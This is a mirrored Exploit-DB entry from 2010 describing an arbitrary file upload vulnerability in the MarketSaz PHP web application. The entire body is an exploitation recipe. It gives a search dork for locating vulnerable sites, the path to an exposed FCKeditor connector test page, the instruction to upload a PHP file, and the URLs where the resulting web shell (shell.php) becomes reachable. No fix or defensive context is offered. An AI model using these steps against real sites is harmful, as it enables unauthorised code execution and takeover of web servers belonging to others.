MarketSaz – Arbitrary File Upload

• Exploit Database
• 109 阅读

• 作者： NetQurd
  日期： 2010-06-18
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/13927/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33

  ========================================== MarketSaz remote file Upload Vulnerability ==========================================     #Exploit Title: MarketSaz remote file uploade   #Author: NetQurd (NetQurd@Live.com)   #Dork : English = Powered MarketSaz     #Software Link: http://www.marketsaz.com   #Platform :linux/php   #Exploit : http://target.com   #http://target.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html   #Example site: http://server   #Select the "File Upload" To use = php   #http://server/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html   #Sh3ll : http://server/admin/view/javascript/fckeditor/editor/filemanager/connectors/php/shell.php   #OR   #http://server/shell.php # Spical Thanks To Net.Edit0r (Net.Edit0r@att.net)